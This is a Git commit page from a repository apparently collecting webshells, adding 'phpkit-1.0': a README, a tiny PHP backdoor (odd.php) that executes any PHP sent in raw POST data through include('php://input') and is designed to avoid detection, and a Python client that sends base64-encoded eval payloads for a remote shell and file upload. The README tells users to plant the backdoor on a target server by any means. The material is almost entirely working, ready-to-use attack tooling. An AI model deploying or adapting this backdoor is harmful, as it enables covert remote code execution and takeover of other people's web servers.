PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-14 19:59:04 +00:00
Code Issues Projects Releases Wiki Activity

update

Browse Source 
php shell and jsp shell
This commit is contained in:
tennc
2013-09-13 10:44:57 +08:00
parent 5ba51580de
commit df6d55ad4f
29 changed files with 7756 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

97
php/phpkit-1.0/README.txt Normal file
View File

@@ -0,0 +1,97 @@
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
phpkit-1.0
Stealth PHP Backdooring Utility - Insecurety Research 2013
This is a simple kit to demonstrate a very effective way of
backdooring a webserver running PHP.
Essentially, it functions by parsing out any valid PHP code
from raw HTTP POST data sent to it, and executing said PHP.
No eval() or other suspect calls are in the serverside script,
the code is executed by the include() function. The php://input
data stream (which is basically "anything sent via raw POST) is
used to "capture" the raw POST data, and when parsed by include()
the code sent is executed.
This allows for many things to be done, i.e. executing any PHP
code you happen to write. The example client, phpkitcli.py, offers
file upload and a remote shell.
This release includes a massively overhauled backdoor client, it
tests various execution functions against the victim host before
using whatever one works first. It is massively ugly code, but
I intend to clean it up soonish.
USAGE (backdoor part):
You upload "odd.php" to the target webserver by any means necessary.
You then run ./phpkitcli.py --url <url to php file on server> and enjoy!
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php
[+] URL in use: http://localhost/odd.php
[+] Testing system function
[+] system() function works
shell:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell:~$ uname -a
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
USAGE (file uploader part):
This assumes "odd.php" is loaded onto the victim webserver, obviously.
You run:
./phpkitcli.py --url <url to odd.php> --lfile <file to upload> --rfile <remote path> --mode UPLOAD
Only works if remote path is writeable. /tmp/ is always good :)
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php --mode UPLOAD --lfile /etc/passwd --rfile /tmp/pass
[+] Uploading File
[+] Upload should be complete
So the file uploaded, now I compare MD5sums to check did it bloody well work!
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
2568416e280af88f82e982efd46525a8 /etc/passwd
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
2568416e280af88f82e982efd46525a8 /tmp/pass
Seems legit bro ;)
TODO:
MySQL client.
Notes:
In two use-cases this was shown to not function.
Use Case A: Servers with the Suhosin PHP Hardening Patches.
In this case, php://input and other URL inclusion vectors are rendered
unuseable due to the protections the Suhosin patches offer. i.e. this
tool don't work against Suhosin patched boxes.
Use Case B: Servers where php.ini is dictated by httpd.conf
In several cases where the php.ini is specific to the HTTP daemon,
runtime ini directive modification is not permissable. I have
personally observed this behaviour on Apache thus far, however
further testing/research is needed to find a workaround of some kind.
Please report if you have any issues getting this to work. Please
test it on a server with allow_url_include = On , then if it works,
set allow_url_include = Off , restart httpd, and check does it work.
If it does not work, please report using the issue tracker at
http://code.google.com/p/insecurety-research providing details of HTTPD
configuration so I can attempt to figure out new things :)
Questions, comments, bug reports and abuse? infodox () insecurety.net
Licence: The do whatever you want with it, just don't rip code without
giving credit licence.

5
php/phpkit-1.0/odd.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
include('php://input');
?>

132
php/phpkit-1.0/phpkitcli.py Normal file
View File

@@ -0,0 +1,132 @@
#!/usr/bin/python
import argparse
import requests
import sys
help = """Connects to a phpkit backdoor and provides file upload or shell access"""
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--url", help="URL of backdoor", required=True)
parser.add_argument("--mode", help="UPLOAD or SHELL", default="SHELL")
parser.add_argument("--lfile", help="File to Upload (full path)")
parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
args = parser.parse_args()
url = args.url
mode = args.mode
localfile = args.lfile
remotefile = args.rfile
tester = """echo w00tw00tw00t"""
testkey = """w00tw00tw00t"""
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
if func == "system":
rawphp = """system('%s');""" %(cmd)
elif func == "shellexec":
rawphp = """echo shell_exec('%s');""" %(cmd)
elif func == "passthru":
rawphp = """passthru('%s');""" %(cmd)
elif func == "exec":
rawphp = """echo exec('%s');""" %(cmd)
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
###
def shell(func):
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
def upload(url, localfile, remotefile):
f = open(localfile, "r")
rawfiledata = f.read()
encodedfiledata = rawfiledata.encode('base64')
phppayload = """<?php
$f = fopen("%s", "a");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
print "[+] Uploading File"
requests.post(url, phppayload) # this is why I love the python requests library
print "[+] Upload should be complete"
sys.exit(0)
def main(url, localfile, remotefile, mode):
if mode == "UPLOAD":
upload(url, localfile, remotefile)
elif mode == "SHELL":
func = test(url, test, testkey)
shell(func)
else:
print "[-] Mode Invalid... Exit!"
sys.exit(0)
main(url, localfile, remotefile, mode)